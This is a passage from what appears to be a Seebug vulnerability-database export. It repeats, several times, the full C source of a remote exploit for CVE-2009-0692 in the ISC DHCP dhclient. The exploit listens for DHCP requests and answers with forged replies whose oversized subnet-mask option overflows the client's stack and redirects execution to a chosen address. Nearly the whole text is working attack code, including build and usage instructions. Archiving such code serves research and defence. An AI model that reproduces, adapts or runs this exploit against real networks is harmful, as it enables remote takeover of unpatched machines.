{\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt-&#62;len);\r\n\t\t}\r\n\t\tif (dhcp_opt-&#62;opt == DHCP_OPT_END) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tif (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt-&#62;len &#62; clen) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt-&#62;len);\r\n\t}\r\n\r\n\t/* only care about REQUEST msg types */\r\n\tif (msg_type != DHCP_TYPE_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\tprintf(&#34;[+] snarfed DHCP request from %s with xid 0x%08x\\n&#34;, eth_ntoa(&eth_h-&#62;eth_src), dhcp_h-&#62;xid);\r\n\tprintf(&#34;[+] sending malicious DHCP response to %s with xid 0x%08x\\n\\n&#34;, eth_ntoa(&eth_h-&#62;eth_src), dhcp_h-&#62;xid);\r\n\r\n\t/* construct stack payload */\r\n\tmemset(payload, 0, sizeof(payload));\r\n\tptr = payload;\r\n\tmemset(ptr, 0, 16);\r\n\tptr += 16;\r\n\tmemcpy(ptr, READABLE_1, 4);\r\n\tptr += 4;\r\n\tmemcpy(ptr, READABLE_2, 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 8);\r\n\tptr += 8;\r\n\tmemcpy(ptr, &#34;\\x04\\x00\\x00\\x00&#34;, 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 28);\r\n\tptr += 28;\r\n\tmemcpy(ptr, JMP_TARGET, 4);\r\n\tptr += 4;\r\n\tpayload_len = ptr - payload;\r\n\r\n\t/* dhcp header */\r\n\tdhcp_h-&#62;op = DHCP_OP_REPLY;\r\n\tmemcpy(&dhcp_h-&#62;yiaddr, &yiaddr, 4);\r\n\r\n\t/* normal dhcp options */\r\n\tmemset(options, 0, sizeof(options));\r\n\tptr = options;\r\n\tmemcpy(ptr, &#34;\\x35\\x01\\x05&#34;, 3);\r\n\tptr += 3;\r\n\tmemcpy(ptr, &#34;\\x36\\x04\\x00\\x06\\x09\\x02&#34;, 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, &#34;\\x33\\x04\\x00\\x09\\x3a\\x80&#34;, 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, &#34;\\x03\\x04\\x00\\x06\\x09\\x02&#34;, 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, &#34;\\x06\\x04\\x00\\x06\\x09\\x02&#34;, 6);\r\n\tptr += 6;\r\n\r\n\t/* malicious subnet mask option */\r\n\tmemcpy(ptr, &#34;\\x01&#34;, 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, &payload_len, 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, payload, payload_len);\r\n\tptr += payload_len;\r\n\r\n\tmemcpy(ptr, &#34;\\xff&#34;, 1);\r\n\tptr += 1;\r\n\topt_len = ptr - options;\r\n\r\n\t/* construct full packet payload */\r\n\tmemset(pktbuf, 0, sizeof(pktbuf));\r\n\tptr = pktbuf;\r\n\r\n\teth_pack_hdr(ptr, ETH_ADDR_BROADCAST, &#34;\\xc1\\x1e\\x20\\x09\\x06\\x92&#34;, ETH_TYPE_IP);\r\n\tptr += ETH_HDR_LEN;\r\n\r\n\tip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);\r\n\tptr += IP_HDR_LEN;\r\n\r\n\tudp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\tptr += UDP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, dhcp_h, DHCP_HDR_LEN);\r\n\tptr += DHCP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, options, opt_len);\r\n\tptr += opt_len;\r\n\r\n\tip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\r\n\t/* fire off malicious response */\r\n\traw = eth_open(dev);\r\n\tif (!raw) {\r\n\t\tfprintf(stderr, &#34;[-] error opening raw socket on %s\\n&#34;, dev);\r\n\t\texit(1);\r\n\t}\r\n\teth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\teth_close(raw);\r\n}\r\n\r\nvoid\r\nusage(char **argv)\r\n{\r\n\tfprintf(stderr, &#34;usage: %s [-i interface]\\n&#34;, argv[0]);\r\n\texit(1);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint ch, ret;\r\n\tchar *dev = NULL;\r\n\tchar errbuf[PCAP_ERRBUF_SIZE];\r\n\tstruct bpf_program bfp;\r\n\tpcap_t *ph;\r\n\t\r\n\topterr = 0;\r\n\r\n\twhile ((ch = getopt(argc, argv, &#34;i:&#34;)) != -1) {\r\n\t\tswitch (ch) {\r\n\t\tcase &#39;i&#39;:\r\n\t\t\tdev = optarg;\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tusage(argv);\r\n\t\t}\r\n\t}\r\n\r\n\tif (!dev) {\r\n\t\tdev = pcap_lookupdev(errbuf);\r\n\t\tif (!dev) {\r\n\t\t\tfprintf(stderr, &#34;[-] couldn&#39;t find default interface: %s\\n&#34;, errbuf);\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\r\n\tph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);\r\n\tif (!ph) {\r\n\t\tfprintf(stderr, &#34;[-] couldn&#39;t open interface %s: %s\\n&#34;, dev, errbuf);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, &#34;[-] couldn&#39;t parse BPF filter: %s\\n&#34;, pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tpcap_setfilter(ph, &bfp);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, &#34;[-] couldn&#39;t set BPF filter: %s\\n&#34;, pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf(&#34;[+] listening on %s: %s\\n&#34;, dev, BPF_FILTER);\r\n\r\n\tpcap_loop(ph, -1, process, dev);\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-67020", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:40:50", "description": "No description provided by source.", "cvss3": {}, "published": "2009-11-10T00:00:00", "type": "seebug", "title": "ISC DHCP 'dhclient' 'script_write_params()' Stack Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2009-11-10T00:00:00", "id": "SSV:14375", "href": "https://www.seebug.org/vuldb/ssvid-14375", "sourceData": "\n /*\r\n * cve-2009-0692.c\r\n *\r\n * ISC DHCP dhclient &lt; 3.1.2p1 Remote Exploit\r\n * Jon Oberheide &lt;jon@oberheide.org&gt;\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n * \r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\r\n * \r\n * Stack-based buffer overflow in the script_write_params method in \r\n * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \r\n * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \r\n * execute arbitrary code via a crafted subnet-mask option.\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet\r\n * $ sudo ./cve-2009-0692\r\n * [+] listening on eth0: ip and udp and src port 68 and dst port 67\r\n * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920\r\n * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920\r\n *\r\n * $ gdb /sbin/dhclient\r\n * ...\r\n * DHCPREQUEST on eth0 to 255.255.255.255 port 67\r\n * DHCPACK from 0.6.9.2\r\n * ...\r\n * Program received signal SIGSEGV, Segmentation fault.\r\n * 0x41414141 in ?? ()\r\n * \r\n * Notes:\r\n * \r\n * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free\r\n * to tweak for your target platform. Depends on libdnet and libpcap.\r\n *\r\n * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \r\n * stack during our overflow. After a successful return from the vulnerable\r\n * script_write_params function, EIP will be set to JMP_TARGET.\r\n *\r\n * Exclusively for use at DEFCON next week. ;-) \r\n */\r\n\r\n#include &lt;ctype.h&gt;\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;stdint.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;unistd.h&gt;\r\n#include &lt;dnet.h&gt;\r\n#include &lt;pcap.h&gt;\r\n\r\n#define READABLE_1 &quot;\\xa8\\xfc\\x0b\\x08&quot; /* for es.client */\r\n#define READABLE_2 &quot;\\xbc\\x34\\x0a\\x08&quot; /* for es.prefix */\r\n#define JMP_TARGET &quot;\\x41\\x41\\x41\\x41&quot;\r\n\r\n#define BPF_FILTER &quot;ip and udp and src port 68 and dst port 67&quot;\r\n#define PKT_BUFSIZ 1514\r\n#define DHCP_OP_REQUEST 1\r\n#define DHCP_OP_REPLY 2\r\n#define DHCP_TYPE_REQUEST 3\r\n#define DHCP_TYPE_ACK 5\r\n#define DHCP_OPT_REQIP 50\r\n#define DHCP_OPT_MSGTYPE 53\r\n#define DHCP_OPT_END 255\r\n#define DHCP_CHADDR_LEN 16\r\n#define SERVERNAME_LEN 64\r\n#define BOOTFILE_LEN 128\r\n#define DHCP_HDR_LEN 240\r\n#define DHCP_OPT_HDR_LEN 2\r\n\r\n#ifndef __GNUC__\r\n# define __attribute__(x)\r\n# pragma pack(1)\r\n#endif\r\n\r\nstruct dhcp_hdr {\r\n\tuint8_t op;\r\n\tuint8_t hwtype;\r\n\tuint8_t hwlen;\r\n\tuint8_t hwopcount;\r\n\tuint32_t xid;\r\n\tuint16_t secs;\r\n\tuint16_t flags;\r\n\tuint32_t ciaddr;\r\n\tuint32_t yiaddr;\r\n\tuint32_t siaddr;\r\n\tuint32_t giaddr;\r\n\tuint8_t chaddr[DHCP_CHADDR_LEN];\r\n\tuint8_t servername[SERVERNAME_LEN];\r\n\tuint8_t bootfile[BOOTFILE_LEN];\r\n\tuint32_t cookie;\r\n} __attribute__((__packed__));\r\n\r\nstruct dhcp_opt {\r\n\tuint8_t opt;\r\n\tuint8_t len;\r\n} __attribute__((__packed__));\r\n\r\n#ifndef __GNUC__\r\n# pragma pack()\r\n#endif\r\n\r\nvoid\r\nprocess(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)\r\n{\r\n\teth_t *raw;\r\n\tstruct ip_hdr *ip_h;\r\n\tstruct eth_hdr *eth_h;\r\n\tstruct udp_hdr *udp_h;\r\n\tstruct dhcp_hdr *dhcp_h;\r\n\tstruct dhcp_opt *dhcp_opt;\r\n\tchar *dev = data, *ptr;\r\n\tchar pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];\r\n\tint opt_len, clen = pkthdr-&gt;caplen;\r\n\tuint8_t msg_type = 0, payload_len = 0;\r\n\tuint32_t yiaddr = 0;\r\n\r\n\t/* packet too short */\r\n\tif (clen &lt; ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {\r\n\t\treturn;\r\n\t}\r\n\r\n\teth_h = (struct eth_hdr *) pkt;\r\n\tip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);\r\n\tudp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);\r\n\tdhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);\r\n\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);\r\n\r\n\t/* only care about REQUEST opcodes */\r\n\tif (dhcp_h-&gt;op != DHCP_OP_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\t/* parse DHCP options */\r\n\twhile (1) {\r\n\t\tif (dhcp_opt-&gt;opt == DHCP_OPT_MSGTYPE) {\r\n\t\t\tif (dhcp_opt-&gt;len != 1) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&amp;msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt-&gt;len);\r\n\t\t}\r\n\t\tif (dhcp_opt-&gt;opt == DHCP_OPT_REQIP) {\r\n\t\t\tif (dhcp_opt-&gt;len != 4) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&amp;yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt-&gt;len);\r\n\t\t}\r\n\t\tif (dhcp_opt-&gt;opt == DHCP_OPT_END) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tif (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt-&gt;len &gt; clen) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt-&gt;len);\r\n\t}\r\n\r\n\t/* only care about REQUEST msg types */\r\n\tif (msg_type != DHCP_TYPE_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\tprintf(&quot;[+] snarfed DHCP request from %s with xid 0x%08x\\n&quot;, eth_ntoa(&amp;eth_h-&gt;eth_src), dhcp_h-&gt;xid);\r\n\tprintf(&quot;[+] sending malicious DHCP response to %s with xid 0x%08x\\n\\n&quot;, eth_ntoa(&amp;eth_h-&gt;eth_src), dhcp_h-&gt;xid);\r\n\r\n\t/* construct stack payload */\r\n\tmemset(payload, 0, sizeof(payload));\r\n\tptr = payload;\r\n\tmemset(ptr, 0, 16);\r\n\tptr += 16;\r\n\tmemcpy(ptr, READABLE_1, 4);\r\n\tptr += 4;\r\n\tmemcpy(ptr, READABLE_2, 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 8);\r\n\tptr += 8;\r\n\tmemcpy(ptr, &quot;\\x04\\x00\\x00\\x00&quot;, 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 28);\r\n\tptr += 28;\r\n\tmemcpy(ptr, JMP_TARGET, 4);\r\n\tptr += 4;\r\n\tpayload_len = ptr - payload;\r\n\r\n\t/* dhcp header */\r\n\tdhcp_h-&gt;op = DHCP_OP_REPLY;\r\n\tmemcpy(&amp;dhcp_h-&gt;yiaddr, &amp;yiaddr, 4);\r\n\r\n\t/* normal dhcp options */\r\n\tmemset(options, 0, sizeof(options));\r\n\tptr = options;\r\n\tmemcpy(ptr, &quot;\\x35\\x01\\x05&quot;, 3);\r\n\tptr += 3;\r\n\tmemcpy(ptr, &quot;\\x36\\x04\\x00\\x06\\x09\\x02&quot;, 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, &quot;\\x33\\x04\\x00\\x09\\x3a\\x80&quot;, 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, &quot;\\x03\\x04\\x00\\x06\\x09\\x02&quot;, 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, &quot;\\x06\\x04\\x00\\x06\\x09\\x02&quot;, 6);\r\n\tptr += 6;\r\n\r\n\t/* malicious subnet mask option */\r\n\tmemcpy(ptr, &quot;\\x01&quot;, 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, &amp;payload_len, 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, payload, payload_len);\r\n\tptr += payload_len;\r\n\r\n\tmemcpy(ptr, &quot;\\xff&quot;, 1);\r\n\tptr += 1;\r\n\topt_len = ptr - options;\r\n\r\n\t/* construct full packet payload */\r\n\tmemset(pktbuf, 0, sizeof(pktbuf));\r\n\tptr = pktbuf;\r\n\r\n\teth_pack_hdr(ptr, ETH_ADDR_BROADCAST, &quot;\\xc1\\x1e\\x20\\x09\\x06\\x92&quot;, ETH_TYPE_IP);\r\n\tptr += ETH_HDR_LEN;\r\n\r\n\tip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);\r\n\tptr += IP_HDR_LEN;\r\n\r\n\tudp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\tptr += UDP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, dhcp_h, DHCP_HDR_LEN);\r\n\tptr += DHCP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, options, opt_len);\r\n\tptr += opt_len;\r\n\r\n\tip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\r\n\t/* fire off malicious response */\r\n\traw = eth_open(dev);\r\n\tif (!raw) {\r\n\t\tfprintf(stderr, &quot;[-] error opening raw socket on %s\\n&quot;, dev);\r\n\t\texit(1);\r\n\t}\r\n\teth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\teth_close(raw);\r\n}\r\n\r\nvoid\r\nusage(char **argv)\r\n{\r\n\tfprintf(stderr, &quot;usage: %s [-i interface]\\n&quot;, argv[0]);\r\n\texit(1);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint ch, ret;\r\n\tchar *dev = NULL;\r\n\tchar errbuf[PCAP_ERRBUF_SIZE];\r\n\tstruct bpf_program bfp;\r\n\tpcap_t *ph;\r\n\t\r\n\topterr = 0;\r\n\r\n\twhile ((ch = getopt(argc, argv, &quot;i:&quot;)) != -1) {\r\n\t\tswitch (ch) {\r\n\t\tcase 'i':\r\n\t\t\tdev = optarg;\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tusage(argv);\r\n\t\t}\r\n\t}\r\n\r\n\tif (!dev) {\r\n\t\tdev = pcap_lookupdev(errbuf);\r\n\t\tif (!dev) {\r\n\t\t\tfprintf(stderr, &quot;[-] couldn't find default interface: %s\\n&quot;, errbuf);\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\r\n\tph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);\r\n\tif (!ph) {\r\n\t\tfprintf(stderr, &quot;[-] couldn't open interface %s: %s\\n&quot;, dev, errbuf);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = pcap_compile(ph, &amp;bfp, BPF_FILTER, 1, 0);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, &quot;[-] couldn't parse BPF filter: %s\\n&quot;, pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tpcap_setfilter(ph, &amp;bfp);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, &quot;[-] couldn't set BPF filter: %s\\n&quot;, pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf(&quot;[+] listening on %s: %s\\n&quot;, dev, BPF_FILTER);\r\n\r\n\tpcap_loop(ph, -1, process, dev);\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14375", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:42:19", "description": "No description provided by source.", "cvss3": {}, "published": "2009-07-28T00:00:00", "type": "seebug", "title": "ISC DHCP dhclient &lt; 3.1.2p1 Remote Buffer Overflow PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2009-07-28T00:00:00", "id": "SSV:11889", "href": "https://www.seebug.org/vuldb/ssvid-11889", "sourceData": "\n /*\r\n * cve-2009-0692.c\r\n *\r\n * ISC DHCP dhclient &lt; 3.1.2p1 Remote Exploit\r\n * Jon Oberheide &lt;jon@oberheide.org&gt;\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n * \r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\r\n * \r\n * Stack-based buffer overflow in the script_write_params method in \r\n * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \r\n * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \r\n * execute arbitrary code via a crafted subnet-mask option.\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet\r\n * $ sudo ./cve-2009-0692\r\n * [+] listening on eth0: ip and udp and src port 68 and dst port 67\r\n * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920\r\n * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920\r\n *\r\n * $ gdb /sbin/dhclient\r\n * ...\r\n * DHCPREQUEST on eth0 to 255.255.255.255 port 67\r\n * DHCPACK from 0.6.9.2\r\n * ...\r\n * Program received signal SIGSEGV, Segmentation fault.\r\n * 0x41414141 in ?? ()\r\n * \r\n * Notes:\r\n * \r\n * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free\r\n * to tweak for your target platform. Depends on libdnet and libpcap.\r\n *\r\n * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \r\n * stack during our overflow. After a successful return from the vulnerable\r\n * script_write_params function, EIP will be set to JMP_TARGET.\r\n *\r\n * Exclusively for use at DEFCON next week. ;-) \r\n */\r\n\r\n#include &lt;ctype.h&gt;\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;stdint.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;unistd.h&gt;\r\n#include &lt;dnet.h&gt;\r\n#include &lt;pcap.h&gt;\r\n\r\n#define READABLE_1 &quot;\\xa8\\xfc\\x0b\\x08&quot; /* for es.client */\r\n#define READABLE_2 &quot;\\xbc\\x34\\x0a\\x08&quot; /* for es.prefix */\r\n#define JMP_TARGET &quot;\\x41\\x41\\x41\\x41&quot;\r\n\r\n#define BPF_FILTER &quot;ip and udp and src port 68 and dst port 67&quot;\r\n#define PKT_BUFSIZ 1514\r\n#define DHCP_OP_REQUEST 1\r\n#define DHCP_OP_REPLY 2\r\n#define DHCP_TYPE_REQUEST 3\r\n#define DHCP_TYPE_ACK 5\r\n#define DHCP_OPT_REQIP 50\r\n#define DHCP_OPT_MSGTYPE 53\r\n#define DHCP_OPT_END 255\r\n#define DHCP_CHADDR_LEN 16\r\n#define SERVERNAME_LEN 64\r\n#define BOOTFILE_LEN 128\r\n#define DHCP_HDR_LEN 240\r\n#define DHCP_OPT_HDR_LEN 2\r\n\r\n#ifndef __GNUC__\r\n# define __attribute__(x)\r\n# pragma pack(1)\r\n#endif\r\n\r\nstruct dhcp_hdr {\r\n\tuint8_t op;\r\n\tuint8_t hwtype;\r\n\tuint8_t hwlen;\r\n\tuint8_t hwopcount;\r\n\tuint32_t xid;\r\n\tuint16_t secs;\r\n\tuint16_t flags;\r\n\tuint32_t ciaddr;\r\n\tuint32_t yiaddr;\r\